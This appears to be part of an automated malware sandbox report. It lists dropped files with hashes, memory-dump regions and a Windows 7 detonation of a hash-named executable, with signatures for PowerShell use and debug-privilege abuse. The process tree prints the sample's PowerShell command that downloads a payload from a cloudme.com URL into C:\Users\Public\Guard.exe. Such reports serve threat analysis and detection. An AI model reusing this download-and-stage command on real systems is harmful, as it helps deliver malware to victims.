C:\Users\Public\jsc.exe

MD5 94c8e57a80dfca2482dedb87b93d4fd9
SHA1 5729e6c7d2f5ab760f0093b9d44f8ac0f876a803
SHA256 39e87f0edcdd15582cfefdfab1975aadd2c7ca1e3a5f07b1146ce3206f401bb5
SHA512 1798a3607b2b94732b52de51d2748c86f9453343b6d8a417e98e65ddb38e9198cdcb2f45bf60823cb429b312466b28c5103c7588f2c4ef69fa27bfdb4f4c67dc

memory/1508-52-0x0000000006CD0000-0x000000000715E000-memory.dmp

memory/1508-53-0x00000000083B0000-0x0000000008840000-memory.dmp

memory/1508-54-0x0000000008DF0000-0x0000000009394000-memory.dmp

memory/1508-55-0x0000000008930000-0x00000000089C2000-memory.dmp

memory/1508-67-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-77-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-113-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-111-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-109-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-107-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-105-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-103-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-101-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-117-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-115-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-99-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-97-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-95-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-93-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-91-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-89-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-87-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-85-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-83-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-81-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-75-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-73-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-71-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-69-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-65-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-63-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-61-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-59-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-57-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-79-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-56-0x00000000083B0000-0x000000000883A000-memory.dmp

memory/1508-1130-0x0000000006030000-0x0000000006432000-memory.dmp

memory/1508-1131-0x0000000005CE0000-0x0000000005D2C000-memory.dmp

memory/1508-1135-0x0000000005D40000-0x0000000005D94000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AdobeSFX.log

MD5 7d96e2ae9f73e6b73fadaac62119c2a0
SHA1 f0e8de3ec0d6eb9cb90ac952288b6a9b423fbb76
SHA256 4ce7ab94060f74f36288dcce8ec72b65778183d99064660644834010f42b736b
SHA512 01b5a3d8ced0baa1bc3d4337831bfdebbdd98e6400061d828a29ea31c04c56d15ac1aa66a0e81c787491f0a8a542430fd2a39173a9a6ef446f04149da1df7666

C:\Users\Admin\AppData\Local\Temp\Ireqseuphty

MD5 ab893875d697a3145af5eed5309bee26
SHA1 c90116149196cbf74ffb453ecb3b12945372ebfa
SHA256 02b1c2234680617802901a77eae606ad02e4ddb4282ccbc60061eac5b2d90bba
SHA512 6b65c0a1956ce18df2d271205f53274d2905c803d059a0801bf8331ccaa28a1d4842d3585dd9c2b01502a4be6664bde2e965b15fcfec981e85eed37c595cd6bc

C:\Users\Admin\AppData\Local\Temp\Ruieetteer

MD5 013b18b14247306181ec7ae01d24aa15
SHA1 5ce4cb396bf23585fbcae7a9733fe0f448646313
SHA256 edb18b52159d693f30ba4621d1e7fd8d0076bfd062e6dda817601c29588bea44
SHA512 2035c94569822378b045c0953659d9745b02d798ab08afc6120974b73dd9747bb696571ea83b4780f0590ca9772fc856f79bea29694fe463b1a388337da8bd94

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-17 02:36

Reported

2024-11-17 02:39

Platform

win7-20240903-en

Max time kernel

119s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe

"C:\Users\Admin\AppData\Local\Temp\e407a38eed731274df47ae9255e471e6c1eadee50a786f93108d177d932f1172.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:slight-stood/:web_1/web" -OutFile "C:\Users\Public\Guard.exe""

Network

N/A

Files

memory/2904-4-0x000007FEF55DE000-0x000007FEF55DF000-memory.dmp

memory/2904-5-0x000000001B680000-0x000000001B962000-memory.dmp

memory/2904-7-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

memory/2904-6-0x00000000021D0000-0x00000000021D8000-memory.dmp

memory/2904-8-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

memory/2904-10-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

memory/2904-9-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

memory/2904-11-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

memory/2904-12-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp